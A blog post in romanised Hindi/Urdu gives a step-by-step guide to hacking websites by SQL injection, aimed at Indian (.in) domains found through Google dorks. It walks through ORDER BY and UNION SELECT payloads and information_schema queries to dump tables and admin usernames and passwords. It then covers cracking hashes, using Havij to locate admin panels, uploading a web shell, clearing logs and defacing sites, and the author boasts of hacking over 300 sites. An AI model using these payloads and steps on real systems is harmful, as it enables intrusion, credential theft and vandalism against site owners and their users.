Google
Ye Search engine Kholen!
Or Search Karen!
Special Dorks!
inurl:index.php?id=
inurlages.php?id=
inurl:images.php?id=
India Ki Vulnerable websites KEse Dhoonden?????
Apna Dork google Per Likhen
Or site:.in Aakhir Main Likhden
Example:-) inurl:images.php?id= site:.in
Ok Ab TayyAr hoajyen :*
hamain Kya Dhoondna hai???
Vulnerable web
Tables
Column
Admin PAnel And shell UPloading
Defacing Tongue
Ok To Ye Hai ApnI VulneRable Web!
Kese check KAren ye Site vulnerable hai?? bus ‘ Ye Vuln web K End Main Lagayen!
Example:-)
http://www.vuln.in/index.php?id=15′ Aise
http://www.vuln.in/index.php?id=15 Order by 1-- <--
Simple page
http://www.vuln.in/index.php?id=15 Order by 2
Simple Page
http://www.vuln.in/index.php?id=15 Order by 3
Simeple page
http://www.vuln.in/index.php?id=15 Order by 4
Simple Page
http://www.vuln.in/index.php?id=15 Order by 5
Simple Page
http://www.vuln.in/index.php?id=15 Order by 6
1 errorr Aagaya Unknown Column in order To Clause “6”
Iska Matlb http://www.vuln.in/index.php?id=15 Per Sirf 5 hi Columns hain
Ab Union Select Waala Method Start :-)
union Find Karne Se Pehele Vuln Web Ki Value Per – Lagaden !
Example :-)
http://www.vuln.in/index.php?id=-15 Aise
Or Ab Vulnerable column Find KAren!
http://www.vuln.in/index.php?id=-15 Union Select 1,2,3,4,5 vuln web per sirf 5 Columns the!
Phir Kuch Numbers Screen Per Aajeynge Jese 2 3 etc….!
Jo Sub Se Zyada Dark Or Bold Ho Wo Sab Se Zyada Vulnerable hai!
Sochen 2 Sab Se Zyada Dark Or Bold hai!
Ab Tables Found KArne Waal Method Start :-)
Table Found KArne K Liye Sab Se Zyada Dark Or Bold Number “2” Ko Hatake !
ye Likhen group_concat(table_name) or Phir Aakhir main from information_schema.tables where table_schema=database ()–
Example:-)
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema= database ()–
Aise Likhna Hai 2 Ki Jaga Per
So ye hamain Table DedeGa magar Dihaan rahe Sab Kuch Theek Likeyega warna My_sql Fetch error Aajayega!
Like:-) admin,user,post,contacts,timing,gallery, etc etc…!
hamain chahiye Admin Table ! Ab Apna hackBar kholeye Jo k 1 FireFox Addon hai!
Or wahan MySql Likha Hai Wahan Ja Kar CHAR Menu Kholen Or Likhen “Admin”!
Or Wo Kuch Is Tarha Char Dega CHAR(12,13,14,21,43,235,2365,21,) Ye Real nahi hai!
Ok!
ab Aapko group_concat(table_name) Ki Jagah group_concat(column_name) Likhna hOgA Tongue
Or form Information_schema.tables Ki Jagah column Likhna hai Or table_schema= Ki Jagah per table_name Likhna hai Tongue
Example:-) http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where table_name= ChaR (1,2,13,1,3,2142,354,234,)
Ab Column FindinG <Method>
Ab aapko Apni vulnerable Web k aage Ye Karna hai Jo neeche hai
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Done
to Phir Ye aapko Kuch Istarha Dega
logs,username,password,date etc etc hamain username and Password Chahiye!
ab Passwor dKese nikaalen??? Neeche hai sab Kuch
http://www.vuln.in/index.php?id=-15 1,group_concat(username,0x3a,Password) from admin
Or Pass Aapka
90% Times Pass Encrypted Hota Hai Like MD5,MD2,SHa=1 etc etc!
To Isse Decrypt Karna Parta hai ! Maine 300 se zyada Web Hack Ki Lekin Decrypted Pass Or Admin panel nahi mila hahahaha!
Ok Ab Apna havij Open KAren Or usmain Apni vuln Link daalen Aise !
http://www.vuln.in/
Sirf Address Daalen Phir Find Admin Per CLick KAren!
http://www.vuln.in/admin
http://www.vuln.in/administrator
http://www.vuln.in/controlpanel
http://www.vuln.in/kpanel etc etc!
Ab http://www.vuln.in/admin Open KAren!
Or username And Pass Daalen!
Or aB Aap Web main hain Tongue
ab Ager chahen To Shell UPload KAr Sakte hain !
Ager Apne Logs Clear Karna Chahte hain To KArna Parega xD
Phir Uploading Option dhoonden !
Gallery Main images upload Is Best for uploading Shell :X
Ab Aap Apna Shell uPload KAren or deface Karden Tongue
Note:-) Ager Koi SqL Problem hO To zAROR pOChain Or Comments Zaroor
Credit : PakSec0
No comments:
Post a Comment